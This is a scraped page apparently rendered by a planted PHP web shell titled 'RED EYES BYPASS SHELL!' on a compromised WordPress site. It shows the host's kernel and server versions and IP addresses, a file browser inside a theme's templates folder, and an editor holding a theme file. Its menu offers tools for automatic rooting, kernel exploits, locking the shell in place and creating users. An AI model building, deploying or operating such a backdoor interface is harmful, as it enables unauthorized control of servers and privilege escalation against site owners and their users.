Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
ashe /
templates /
grid /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
blog-grid.php
4.04
KB
-rwxr-xr-x
blog-list.php
3.5
KB
-rwxr-xr-x
blog-pagination.php
2.05
KB
-rwxr-xr-x
category-description.php
381
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : category-description.php
<?php $categories = get_category( get_query_var( 'cat' ) ); $category_name = $categories->name; $category_description = $categories->category_description; ?> <div class="category-description"> <h4><?php echo esc_html( $category_name ); ?></h4> <?php if ( !empty( $category_description ) ) { echo '<p>'. $category_description .'</p>'; } ?> </div>
Close